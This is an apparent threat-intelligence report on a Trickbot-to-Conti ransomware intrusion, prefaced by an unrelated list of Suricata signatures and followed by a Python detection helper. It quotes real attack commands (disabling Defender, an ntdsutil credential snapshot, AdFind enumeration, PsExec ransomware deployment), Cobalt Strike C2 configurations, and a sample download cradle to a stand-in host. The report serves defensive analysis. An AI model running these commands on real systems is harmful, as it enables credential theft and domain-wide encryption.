sid: 2220000 signature: «SURICATA SMTP invalid reply» null
sid: 2220004 signature: «SURICATA SMTP invalid pipelined sequence» null
sid: 2220006 signature: «SURICATA SMTP no server welcome message» null
sid: 2220007 signature: «SURICATA SMTP tls rejected» null
sid: 2220008 signature: «SURICATA SMTP data command rejected» null
sid: 2221001 signature: «SURICATA HTTP gzip decompression failed» null
sid: 2221002 signature: «SURICATA HTTP request field missing colon» null
sid: 2221003 signature: «SURICATA HTTP invalid request chunk len» null
sid: 2221004 signature: «SURICATA HTTP invalid response chunk len» null
sid: 2221005 signature: «SURICATA HTTP invalid transfer encoding value in request» null
sid: 2221007 signature: «SURICATA HTTP invalid content length field in request» null
sid: 2221009 signature: «SURICATA HTTP status 100-Continue already seen» null
sid: 2221010 signature: «SURICATA HTTP unable to match response to request» null
sid: 2221013 signature: «SURICATA HTTP request header invalid» null
sid: 2221014 signature: «SURICATA HTTP missing Host header» null
sid: 2221015 signature: «SURICATA HTTP Host header ambiguous» null
sid: 2221017 signature: «SURICATA HTTP invalid response field folding» null
sid: 2221020 signature: «SURICATA HTTP response field missing colon» null
sid: 2221021 signature: «SURICATA HTTP response header invalid» null
sid: 2221022 signature: «SURICATA HTTP multipart generic error» null
sid: 2221027 signature: «SURICATA HTTP Host part of URI is invalid» null
sid: 2221028 signature: «SURICATA HTTP Host header invalid» null
sid: 2221030 signature: «SURICATA HTTP METHOD terminated by non-compliant character» null
sid: 2221033 signature: «SURICATA HTTP Request abnormal Content-Encoding header» null
sid: 2230002 signature: «SURICATA TLS invalid record type» null
sid: 2230003 signature: «SURICATA TLS invalid handshake message» null
sid: 2230004 signature: «SURICATA TLS invalid certificate» null
sid: 2230007 signature: «SURICATA TLS certificate invalid length» null
sid: 2230009 signature: «SURICATA TLS error message encountered» null
sid: 2230010 signature: «SURICATA TLS invalid record/traffic» null
sid: 2230012 signature: «SURICATA TLS overflow heartbeat encountered, possible exploit attempt (heartbleed)» [ «http://cve.mitre.org/cgi-bin/cvename.cgi?name=2014-0160» ]
sid: 2230015 signature: «SURICATA TLS invalid record version» null
sid: 2230018 signature: «SURICATA TLS invalid SNI length» null
sid: 2230019 signature: «SURICATA TLS handshake invalid length» null
sid: 2240001 signature: «SURICATA DNS Unsolicited response» null
sid: 2240003 signature: «SURICATA DNS malformed response data» null
sid: 2240005 signature: «SURICATA DNS Not a response» null
Source
Intro
This report will go through an intrusion that went from an Excel file to domain wide ransomware. The threat actors used BazarCall to install Trickbot in the environment which downloaded and executed a Cobalt Strike Beacon. From there the threat actor discovered the internal network before moving laterally to a domain controller for additional discovery. A couple days later, the threat actors came back and executed Conti ransomware across the domain.
Unfamiliar with BazaCall/BazarCall? Read more here from @MsftSecIntel, @dreadphones, & @JCearbhall and here from @Unit42_Intel & @malware_traffic.
Summary
In this intrusion, we observed a number of interesting techniques being leveraged by the threat actors. The threat actors were able to go from initial access to the deployment of Conti ransomware in a matter of hours. The Conti operators chose to wait a couple days before ransoming the environment. Even though most of the techniques aren’t new or advanced, they have proven to be effective. We have observed the same techniques in other intrusions and understanding these techniques will allow defenders to disrupt such intrusion activity and deny it in their own networks.
The Trickbot payload came from a phishing campaign associated with BazarCall, delivering weaponized XLSB files. Upon execution, certutil.exe was copied to %programdata% and renamed with random alphanumeric characters. Certutil was used to download and load the Trickbot DLL into memory. Trickbot was automatically tasked to inject into the wermgr.exe process and use its well-known “pwgrab” module to steal browser credentials. As part of further automated tasking, Trickbot performed an initial reconnaissance of the environment using native Windows tools such as nltest.exe and net.exe.
First hands-on activity was observed two hours after initial compromise, when Trickbot downloaded and executed Cobalt Strike Beacons. To guarantee execution on the beachhead host, multiple payloads were used. One of the Cobalt Strike Beacons was the same payload and command and control infrastructure as used in a prior case. The initial access method for that case was IcedID, which shows that the threat actors utilize various initial access methods to get into environments and accomplish their goals.
Once access through Cobalt Strike was established, the threat actors immediately proceeded with domain enumeration via Nltest, AdFind, BloodHound, and PowerSploit. Presence was then expanded on the beachhead by using a PowerShell loader to execute additional Beacons.
We observed the threat actors having technical issues. One example was a Beacon unsuccessfully injecting into a process. It is unclear whether this was an untrained actor or a configuration issue.
Fifteen minutes after domain enumeration, we observed successful lateral movement to two endpoints on the network. Ten minutes after lateral movement, a PowerShell Cobalt Strike loader executed as a service on a server. Even though the execution was not successful, the threat actors kept trying, a total of eight times, until it finally worked. Windows Defender real-time monitoring was then disabled, the LSASS.exe process was dumped using SysInternals ProcDump, and privilege was escalated to “SYSTEM” using named pipe impersonation.
Almost four hours after initial execution, the threat actors pivoted to a domain controller using domain admin credentials and executed a Cobalt Strike Beacon. Once they had domain controller access, ntdsutil was used to take a snapshot of “ntds.dit”, saved under “C:\Perflogs\1”, for offline password hash extraction. This is a technique that we don’t see very often, but effective nevertheless.
The threat actors then reran many of the same discovery techniques that were previously executed on the beachhead, including AdFind and BloodHound. This was the last observed hands-on-keyboard activity for a while.
Two days later, the Cobalt Strike Beacon on the domain controller was once again actively engaged by the threat actors. PsExec, with two separate batch files, was used to execute Conti ransomware on all domain-joined Windows hosts. This final deployment was executed around 6:45 UTC on a Monday morning.
From the point the threat actors returned, to ransom deployment, it was less than 30 minutes. This would give defenders little time to act if they had not identified and contained the activity from the first day of the Trickbot infection.
Services
We offer multiple services including a Threat Feed service which tracks Command and Control frameworks such as Cobalt Strike, Metasploit, Empire, PoshC2, etc. More information on this service and others can be found here. Two of the Cobalt Strike servers used in this intrusion were added to our Threat Feed on 6/3/21 and the other one was added on 6/11/21.
We also have artifacts available from this case such as pcaps, memory captures, files, event logs including Sysmon, Kape packages, and more, under our Security Researcher and Organization services.
Timeline
Analysis and reporting completed by @_pete_0 and @kostastsale.
Reviewed by @RoxpinTeddy and 1 unnamed contributor.
Initial Access
The initial access was achieved as a result of the user opening what appeared to be a benign workbook, a lure, requiring little user interaction.
The workbook contained hidden, password-protected worksheets; these were malicious. Module functions also indicated code designed to obfuscate and hide true values and functions.
This document and the following DLL were noted as being associated to a BazarCall campaign by @ffforward.
1/ Today #BazarCall dropped #TrickBot gtag mon311 from their brand new website /zonerphoto.us. I guess the gang's increased activity is to show that they are alive and well without that random programmer? pic.twitter.com/CVfcn7b9mJ
— TheAnalyst (@ffforward) June 10, 2021
Execution
From the xlsb document, the following execution chain occurs, including copying the Windows CertUtil program and using it to collect further Trickbot payloads.
We observed a second stage execution using regsvr32 to load a DLL from the user’s AppData\Local\Temp folder.
Almost immediately an outbound IPv4 address lookup was requested via HTTP. This is usually undertaken to identify the compromised environment and to facilitate C2. The user agent refers to Curl, and the same agent was used again for another stage of the intrusion.
On the beachhead, multiple executables were saved in a temp directory and then pushed into memory by TrickBot process “wermgr.exe”. The executables were identified as Cobalt Strike and communicated over port 443 to C2 88.80.147[.]101.
A PowerShell download cradle was then used to execute Cobalt Strike Beacon in memory:
Privilege Escalation
Named pipe impersonation was used to escalate to SYSTEM privileges – a common Cobalt Strike capability:
We observed several attempts by the threat actor trying to escalate to SYSTEM – ultimately succeeding, as evident in several new services running under the Local SYSTEM context:
Service creation events (System Event ID 7045), coupled with unusual commands and service names, are a strong indication of privilege escalation activity. Red Canary provided useful background on the GetSystem capabilities of offensive security tools and methods of detection.
Defense Evasion
Trickbot made extensive use of process injection to hide in benign operating system processes. It first injected into wermgr.exe and then later into svchost.exe.
Another defense evasion technique employed via Cobalt Strike was to disable Windows Defender. WMIC was used to remotely execute ‘def.bat’. The contents of ‘def.bat’:
Set-MpPreference -DisableRealtimeMonitoring $true
Credential Access
Trickbot made use of esentutl to gather MSEdge history, webcache, and saved passwords using TrickBot’s “pwgrab” module.
LSASS was dumped remotely using ProcDump. The execution took place from the beachhead using WMIC.
“Ntdsutil” was used to take a snapshot of ntds.dit and save it under “C:\Perflogs\1”. This technique is useful for offline password hash extraction. This activity occurred twice: the same batch file, ‘12.bat’, was first executed in the context of SYSTEM and then in the context of a domain admin user. The contents of ‘12.bat’:
ntdsutil "ac in ntds" "ifm" "cr fu C:\Perflogs\1" q q
Discovery
Net and Nltest commands were used to gather network and domain reconnaissance. During the intrusion, this activity was seen multiple times, on multiple hosts.
Other discovery commands included:
systeminfo
nltest /dclist:<hidden>.local
nltest /domain_trusts /all_trusts
net localgroup Administrators
whoami.exe /groups
AdFind.exe and adf.bat were uploaded to the beachhead. adf.bat was used to execute:
adfind.exe -f "(objectcategory=person)"
adfind.exe -f "(objectcategory=organizationalUnit)"
adfind.exe -f "objectcategory=computer"
adfind.exe -gcb -sc trustdmp
adfind.exe -f "(objectcategory=group)"
adfind.exe -subnets -f (objectCategory=subnet)
adfind.exe -sc trustdmp
AdFind results were written to the following locations:
C:\Windows\Temp\adf\ad_group.txt
C:\Windows\Temp\adf\trustdmp.txt
C:\Windows\Temp\adf\subnets.txt
C:\Windows\Temp\adf\ad_ous.txt
C:\Windows\Temp\adf\ad_computers.txt
C:\Windows\Temp\adf\ad_users.txt
On the beachhead, Cobalt Strike executed BloodHound in memory. The results were saved in:
"C:\Windows\Temp\Dogi"
BloodHound was later executed on the domain controller as well. Once again the results were stored in:
"C:\Windows\Temp\Dogi"
PowerSploit was loaded into memory on the DC and the following functions were used:
Get-NetSubnet
Get-NetComputer -ping
An encoded PowerShell command was executed on the domain controller to enumerate all AD joined hosts and save the results to:
"C:UsersAllWindows.csv"
The decoded PowerShell command:
Lateral Movement
From the beachhead, WMIC was used to remotely execute ‘165.bat’ on two other hosts.
Multiple failed attempts were observed prior to the successful execution of a PowerShell Cobalt Strike loader via a service with “SYSTEM” privileges.
Decoded Cobalt Strike shellcode, using the CyberChef recipe: https://github.com/mattnotmax/cyberchef-recipes#recipe-28---de-obfuscation-of-cobalt-strike-beacon-using-conditional-jumps-to-obtain-shellcode
Command and Control
Multiple C2 channels were established; some were persistent whilst others appeared to be single purpose, used for payload retrieval or fallback C2. Persistent C2 activity was Cobalt Strike. The beachhead had multiple C2 channels, two of which were unique. We assess that the threat actors were ensuring that the loss of a single C2 source wouldn’t result in losing all C2 to the compromised environment.
We observed a payload being retrieved from a unique IPv4 address, an indication that the threat actors were keeping C2 channels independent from payload delivery/retrieval.
Using the Curl 7.74.0 user agent:
Analysis of this binary shows C2 activity to the following:
The binary has an unusual PDB string that indicates obfuscation:
The two persistent C2 channels were analyzed to determine the Cobalt Strike configuration. Each C2 channel was configured as follows:
- 149.248.52[.]187:443
- Onlineworkercz[.]com
(added to Threat Feed on 2021-06-11)
{
"x86": {
"sha1": "3f15a07cde64efda49670664af320603cf19e8a3",
"sha256": "d4ab4ed720d674d4c8c35d48006724a9cf20396e020d5bd6c12fce8d44b8ed5a",
"time": 1623422265288,
"config": {
"Method 1": "GET",
"Spawn To x64": "%windir%\\sysnative\\WUAUCLT[.]exe",
"Polling": 55490,
"HTTP Method Path 2": "/media",
"Port": 443,
"Spawn To x86": "%windir%\\syswow64\\WUAUCLT[.]exe",
"Jitter": 41,
"C2 Server": "onlineworkercz[.]com,/kj",
"Method 2": "POST",
"Beacon Type": "8 (HTTPS)"
},
"md5": "7d9cdea210ed05a1ff96d7ff3e576c11"
},
"x64": {
"sha1": "1d50772d506f1def4bd0659b38cf4cb41df7802c",
"sha256": "4f009eb4252cf29daa24d1d018815aa228f0c58aba126bff3fec4cd809cd9747",
"time": 1623422268773.6,
"config": {
"Method 1": "GET",
"Spawn To x64": "%windir%\\sysnative\\WUAUCLT[.]exe",
"Polling": 55490,
"HTTP Method Path 2": "/zh",
"Port": 443,
"Spawn To x86": "%windir%\\syswow64\\WUAUCLT[.]exe",
"Jitter": 41,
"C2 Server": "onlineworkercz[.]com,/kj",
"Method 2": "POST",
"Beacon Type": "8 (HTTPS)"
},
"md5": "23135b04a470db515db11e1364e3fcd9"
}
}
- 88.80.147[.]101:80
- gmbfrom[.]com
(added to Threat Feed on 2021-06-03)
{
"x86": {
"sha1": "b785cae596f7b68376464e3e300fe0aff5bea845",
"config": {
"Method 2": "POST",
"Port": 80,
"Method 1": "GET",
"Polling": 5000,
"Beacon Type": "0 (HTTP)",
"Jitter": 10,
"Spawn To x86": "%windir%\\syswow64\\dllhost[.]exe",
"C2 Server": "88[.]80[.]147[.]101,/jquery-3[.]3[.]1[.]min[.]js",
"HTTP Method Path 2": "/jquery-3[.]3[.]2[.]min[.]js",
"Spawn To x64": "%windir%\\sysnative\\dllhost[.]exe"
},
"time": 1622753064031.5,
"sha256": "dd0dd0b3e95ff62c45af048c0169e2631ac906da4a603cadbc7014cbcfb4e631",
"md5": "56830f9cc0fe712e22921a7a5a0f1a53"
},
"x64": {
"sha1": "11724324f8ec1940be87553ae2bd5f96b979a5d6",
"config": {
"Method 2": "POST",
"Port": 80,
"Method 1": "GET",
"Polling": 5000,
"Beacon Type": "0 (HTTP)",
"Jitter": 10,
"Spawn To x86": "%windir%\\syswow64\\dllhost[.]exe",
"C2 Server": "88[.]80[.]147[.]101,/jquery-3[.]3[.]1[.]min[.]js",
"HTTP Method Path 2": "/jquery-3[.]3[.]2[.]min[.]js",
"Spawn To x64": "%windir%\\sysnative\\dllhost[.]exe"
},
"time": 1622753068830.2,
"sha256": "36a5e68810f3823470fadd578efb75b5c2d1ffe9f4a16d5566f0722257cc51ce",
"md5": "9dde7f14a076a5c3db8f4472b87fd11e"
}
}
Trickbot C2 Configuration:
https://tria.ge/210610-vfygj4t1yn
Exfiltration
As part of the discovery stage, we observed data being exfiltrated. The data included host discovery output, running processes, and user accounts:
Entire AD forest data, including usernames, DC configuration, and machine enumeration:
Impact
When the threat actors returned two days later, the final payloads were staged on a domain controller in the following location:
C:\share$
Two batch scripts were executed on the domain controller to automate ransomware deployment via PSExec. The first was “_COPY.bat”, to stage the CONTI ransomware payload on all domain-joined computers. The second was “_EXE.bat”, to execute the staged CONTI payloads.
The batch scripts ran, as expected, a set of copy commands and then executed the Conti payload using PsExec.
start PsExec.exe -accepteula @C:\share$\comps1.txt -u "domain\User" -p "$PASSWORD" cmd /c COPY "\\DOMAINCONTROLLER\share$\fQumH.exe" "C:\windows\temp"
start PsExec.exe -accepteula -d @C:\share$\comps5.txt -u "domain\User" -p "$PASSWORD" cmd /c "C:\windows\temp\fQumH.exe"
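The command lines quoted in this report (the ntdsutil snapshot, ProcDump on LSASS, the Defender change in def.bat, the PsExec deployment above) and the Event ID 7045 service-install pattern from the Privilege Escalation section can be turned into triage logic. The following Python is an added example, not DFIR Report code; the record field names, the rule names and the sample events are constructed assumptions, not real logs from the case.

```python
"""Triage helpers for the command lines and the System Event ID 7045 pattern
described in this report. Added example, not DFIR Report code; the record
field names and the sample events are constructed assumptions, not real logs."""
import base64
import re

# Rules target the behaviour the report describes, not file names or hashes.
COMMAND_LINE_RULES = [
    ("ntdsutil_ifm_snapshot",
     re.compile(r"ntdsutil.*\bac\w*\s+in\w*\s+ntds\b.*\bifm\b", re.I)),
    ("procdump_lsass", re.compile(r"procdump.*\blsass(\.exe)?\b", re.I)),
    ("defender_realtime_disabled",
     re.compile(r"Set-MpPreference.*-DisableRealtimeMonitoring\s+\$true", re.I)),
    ("psexec_batch_deploy", re.compile(r"psexec.*-accepteula.*@\S+\.txt", re.I)),
    ("adfind_enumeration",
     re.compile(r"adfind.*(objectcategory|trustdmp|-subnets)", re.I)),
    ("powershell_download_cradle",
     re.compile(r"DownloadString|DownloadFile|\bIEX\b|Invoke-Expression|"
                r"Net\.WebClient", re.I)),
]
# -EncodedCommand (and its short forms) carries base64 of a UTF-16LE script.
ENCODED_FLAG = re.compile(
    r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)
# Service-based execution of a PowerShell loader, as seen in this intrusion:
# a %COMSPEC%/cmd one-liner that starts a hidden PowerShell window.
SUSPICIOUS_IMAGE_PATH = re.compile(
    r"(%COMSPEC%|cmd(\.exe)?\s+/[bc]).*powershell|"
    r"powershell.*-w(indowstyle)?\s+hidden", re.I)
SHORT_SERVICE_NAME = re.compile(r"^[A-Za-z0-9]{7}$")

def decode_encoded_powershell(command_line):
    """Return the decoded -EncodedCommand payload, or None if absent/invalid."""
    m = ENCODED_FLAG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def score_command_line(command_line):
    """Names of matching rules; an encoded PowerShell payload is decoded first
    so that the rules also see what the base64 hides."""
    hits, text = [], command_line
    decoded = decode_encoded_powershell(command_line)
    if decoded is not None:
        hits.append("encoded_powershell")
        text += " " + decoded
    hits.extend(n for n, p in COMMAND_LINE_RULES if p.search(text))
    return hits

def analyze_service_install(service_name, image_path, account):
    """Triage one 7045 record. A 7-character service name alone is only a weak
    signal (Spooler has one too), so it never decides the verdict by itself."""
    reasons = score_command_line(image_path)
    if SUSPICIOUS_IMAGE_PATH.search(image_path):
        reasons.append("powershell_service_image_path")
    suspicious = bool(reasons)
    if suspicious and account.lower() in ("localsystem", "nt authority\\system"):
        reasons.append("runs_as_system")
    if SHORT_SERVICE_NAME.match(service_name):
        reasons.append("short_service_name")
    return suspicious, reasons

def build_sample_events():
    """Constructed events modelled on the command lines in this report."""
    cradle = "IEX (New-Object Net.WebClient).DownloadString('http://c2.invalid/a')"
    enc = base64.b64encode(cradle.encode("utf-16-le")).decode()
    return [
        {"event_id": 1, "command_line":
         'ntdsutil "ac in ntds" "ifm" "cr fu C:\\Perflogs\\1" q q'},
        {"event_id": 1, "command_line":
         "procdump.exe -accepteula -ma lsass.exe C:\\Windows\\Temp\\l.dmp"},
        {"event_id": 1, "command_line":
         "powershell Set-MpPreference -DisableRealtimeMonitoring $true"},
        {"event_id": 1, "command_line":
         "start PsExec.exe -accepteula @C:\\share$\\comps1.txt -u domain\\User "
         "-p x cmd /c COPY \\\\DC\\share$\\payload.exe C:\\windows\\temp"},
        {"event_id": 1, "command_line": "svchost.exe -k netsvcs -p"},
        {"event_id": 7045, "service_name": "a1b2c3d", "account": "LocalSystem",
         "image_path": "%COMSPEC% /b /c start /b /min powershell -nop -w hidden "
                       "-encodedcommand " + enc},
        {"event_id": 7045, "service_name": "Spooler", "account": "LocalSystem",
         "image_path": "C:\\Windows\\System32\\spoolsv.exe"},
    ]

def triage(events):
    """Map event index -> reasons, for every event judged suspicious."""
    findings = {}
    for i, ev in enumerate(events):
        if ev["event_id"] == 7045:
            suspicious, reasons = analyze_service_install(
                ev["service_name"], ev["image_path"], ev["account"])
        else:
            reasons = score_command_line(ev["command_line"])
            suspicious = bool(reasons)
        if suspicious:
            findings[i] = reasons
    return findings
```

The benign svchost and Spooler records fall through without findings, which is the point of keeping the short-service-name check as context only.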
Files were then encrypted with the following extension [KCRAO]:
A readme.txt file was created in each folder:
The content of readme.txt:
IOCs
Network
Cobalt Strike
149.248.52.187|443
88.80.147.101|80
onlineworkercz.com
gmbfrom.com
Trickbot
File
Detections
Network
ET POLICY OpenSSL Demo CA - Internet Widgits Pty (O)
ET CNC Feodo Tracker Reported CnC Server group 1
ET CNC Feodo Tracker Reported CnC Server group 2
ET CNC Feodo Tracker Reported CnC Server group 3
ET CNC Feodo Tracker Reported CnC Server group 5
ET CNC Feodo Tracker Reported CnC Server group 8
ET CNC Feodo Tracker Reported CnC Server group 9
ET CNC Feodo Tracker Reported CnC Server group 19
ET CNC Feodo Tracker Reported CnC Server group 22
ET CNC Feodo Tracker Reported CnC Server group 23
ET CNC Feodo Tracker Reported CnC Server group 24
ET POLICY HTTP traffic on port 443 (POST)
ET POLICY PE EXE or DLL Windows file download HTTP
ET POLICY curl User-Agent Outbound
ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response
ET INFO Executable Download from dotted-quad Host
ET HUNTING GENERIC SUSPICIOUS POST to Dotted Quad with Fake Browser 1
ET MALWARE Trickbot Checkin Response
ET POLICY Observed Cloudflare DNS over HTTPS Domain (cloudflare-dns .com in TLS SNI)
ET HUNTING Suspicious POST with Common Windows Process Names - Possible Process List Exfiltration
ET MALWARE Win32/Trickbot Data Exfiltration
ET POLICY IP Check wtfismyip.com
GPL ATTACK_RESPONSE command completed
ET HUNTING Observed Suspicious SSL Cert (External IP Lookup - ident .me)
ET INFO Dotted Quad Host DLL Request
ET MALWARE Cobalt Strike Malleable C2 JQuery Custom Profile M3
ET POLICY Possible External IP Lookup ipinfo.io
Sigma
Abused Debug Privilege by Arbitrary Parent Processes – https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/sysmon_abusing_debug_privilege.yml
Accessing WinAPI in PowerShell. Code Injection – https://github.com/SigmaHQ/sigma/blob/1ff5e226ad8bed34916c16ccc77ba281ca3203ae/rules/windows/powershell/powershell_code_injection.yml
Bad Opsec Powershell Code Artifacts – https://github.com/SigmaHQ/sigma/blob/5e35e387dd0dcdd564db7077da3470fbc070b975/rules/windows/powershell/powershell_bad_opsec_artifacts.yml
CobaltStrike Service Installations – https://github.com/SigmaHQ/sigma/blob/b26eece20d4c19b202185a6dce86aff147e92d0f/rules/windows/builtin/win_cobaltstrike_service_installs.yml
CreateMiniDump Hacktool – https://github.com/SigmaHQ/sigma/blob/1ff5e226ad8bed34916c16ccc77ba281ca3203ae/rules/windows/process_creation/win_hktl_createminidump.yml
Domain Trust Discovery – https://github.com/SigmaHQ/sigma/blob/99b0d32cec5746c8f9a79ddbbeb53391cef326ba/rules/windows/process_creation/win_trust_discovery.yml
Dridex Process Pattern – https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_malware_dridex.yml
Empire PowerShell Launch Parameters – https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_powershell_empire_launch.yml
Execution from Suspicious Folder – https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_execution_path.yml
Invocation of Active Directory Diagnostic Tool (ntdsutil.exe) – https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_ntdsutil.yml
Local Accounts Discovery – https://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_local_system_owner_account_discovery.yml
LSASS Memory Dump – https://github.com/SigmaHQ/sigma/blob/b81839e3ce507df925d6e583e569e1ac3a3894ab/rules/windows/process_access/sysmon_lsass_memdump.yml
LSASS Memory Dump File Creation – https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/file_event/sysmon_lsass_memory_dump_file_creation.yml
LSASS Memory Dumping – https://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_lsass_dump.yml
Malicious Base64 Encoded PowerShell Keywords in Command Lines – https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_powershell_hidden_b64_cmd.yml
Malicious PowerShell Commandlets – https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/powershell/powershell_malicious_commandlets.yml
Mimikatz Detection LSASS Access – https://github.com/SigmaHQ/sigma/blob/b81839e3ce507df925d6e583e569e1ac3a3894ab/rules/windows/deprecated/sysmon_mimikatz_detection_lsass.yml
Net.exe Execution – https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_net_execution.yml
Non Interactive PowerShell – https://github.com/SigmaHQ/sigma/blob/1425ede905514b7dbf3c457561aaf2ff27274724/rules/windows/process_creation/win_non_interactive_powershell.yml
PowerShell as a Service in Registry – https://github.com/SigmaHQ/sigma/blob/a80c29a7c2e2e500a1a532db2a2a8bd69bd4a63d/rules/windows/registry_event/sysmon_powershell_as_service.yml
PowerShell Download from URL – https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_powershell_download.yml
PowerShell Execution – https://github.com/SigmaHQ/sigma/blob/8aabb58eca06cc44ae21ae4d091793d8c5ca6a23/rules/windows/image_load/sysmon_powershell_execution_moduleload.yml
PowerShell Network Connections – https://github.com/SigmaHQ/sigma/blob/c91eda766032b14eee60412a14875f91664e670f/rules/windows/network_connection/sysmon_powershell_network_connection.yml
PowerShell Scripts Installed as Services – https://github.com/SigmaHQ/sigma/blob/a80c29a7c2e2e500a1a532db2a2a8bd69bd4a63d/rules/windows/builtin/win_powershell_script_installed_as_service.yml
Psexec Accepteula Condition – https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_psexec_eula.yml
PsExec Tool Execution – https://github.com/SigmaHQ/sigma/blob/ea430c8823803b9026a4e6e2ea7365dc5d96f385/rules/windows/other/win_tool_psexec.yml
Rare Service Installs – https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/builtin/win_rare_service_installs.yml
Regsvr32 Anomaly – https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_regsvr32_anomalies.yml
Rundll32 Internet Connection – https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/network_connection/sysmon_rundll32_net_connections.yml
Suspicious AdFind Execution – https://github.com/SigmaHQ/sigma/blob/30bee7204cc1b98a47635ed8e52f44fdf776c602/rules/windows/process_creation/win_susp_adfind.yml
Suspicious Encoded PowerShell Command Line – https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_powershell_enc_cmd.yml
Suspicious In-Memory Module Execution – https://github.com/SigmaHQ/sigma/blob/5cf7078fb3d61f2c15b01d9426f07f9197dd3db1/rules/windows/process_access/sysmon_in_memory_assembly_execution.yml
Suspicious PowerShell Parent Process – https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_powershell_parent_process.yml
Suspicious Remote Thread Created – https://github.com/SigmaHQ/sigma/blob/e7d9f1b4279a235406b61cc9c16fde9d7ab5e3ba/rules/windows/create_remote_thread/sysmon_suspicious_remote_thread.yml
Suspicious Use of Procdump – https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_procdump.yml
Suspicious Use of Procdump on LSASS – https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_procdump_lsass.yml
Suspicious WMI Execution – https://github.com/SigmaHQ/sigma/blob/5e701a2bcb353338854c8ab47de616fe7e0e56ff/rules/windows/process_creation/win_susp_wmi_execution.yml
Trickbot Malware Recon Activity – https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_malware_trickbot_recon_activity.yml
UNC2452 Process Creation Patterns – https://github.com/SigmaHQ/sigma/blob/e7d9f1b4279a235406b61cc9c16fde9d7ab5e3ba/rules/windows/process_creation/win_apt_unc2452_cmds.yml
Usage of Sysinternals Tools – https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/registry_event/sysmon_sysinternals_eula_accepted.yml
Whoami Execution – https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_whoami.yml
Windows Network Enumeration – https://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_net_enum.yml
Windows PowerShell Web Request – https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/powershell/win_powershell_web_request.yml
Yara Rules
/*
YARA Rule Set
Author: The DFIR Report
Date: 2021-08-02
Identifier: 4641
Reference: https://thedfirreport.com
*/
/* Rule Set ----------------------------------------------------------------- */
import "pe"
rule sig_4641_fQumH {
meta:
description = "4641 - file fQumH.exe"
author = "The DFIR Report"
reference = "https://thedfirreport.com"
date = "2021-08-02"
hash1 = "3420a0f6f0f0cc06b537dc1395638be0bffa89d55d47ef716408309e65027f31"
strings:
$s1 = "Usage: .system COMMAND" fullword ascii
$s2 = "Usage: .log FILENAME" fullword ascii
$s3 = "* If FILE begins with \"|\" then it is a command that generates the" fullword ascii
$s4 = "AppPolicyGetProcessTerminationMethod" fullword ascii
$s5 = "Usage %s sub-command ?switches...?" fullword ascii
$s6 = "attach debugger to process %d and press any key to continue." fullword ascii
$s7 = "%s:%d: expected %d columns but found %d - extras ignored" fullword ascii
$s8 = "%s:%d: expected %d columns but found %d - filling the rest with NULL" fullword ascii
$s9 = "Unknown option \"%s\" on \".dump\"" fullword ascii
$s10 = "REPLACE INTO temp.sqlite_parameters(key,value)VALUES(%Q,%s);" fullword ascii
$s11 = "error in %s %s%s%s: %s" fullword ascii
$s12 = "UPDATE temp.sqlite_master SET sql = sqlite_rename_column(sql, type, name, %Q, %Q, %d, %Q, %d, 1) WHERE type IN ('trigger', 'view" ascii
$s13 = "BBBBBBBBBBBBBBBBBBBB" wide /* reversed goodware string 'BBBBBBBBBBBBBBBBBBBB' */
$s14 = "UPDATE temp.sqlite_master SET sql = sqlite_rename_column(sql, type, name, %Q, %Q, %d, %Q, %d, 1) WHERE type IN ('trigger', 'view" ascii
$s15 = ");CREATE TEMP TABLE [_shell$self](op,cmd,ans);" fullword ascii
$s16 = "SqlExec" fullword ascii
$s17 = "* If neither --csv or --ascii are used, the input mode is derived" fullword ascii
$s18 = "Where sub-commands are:" fullword ascii
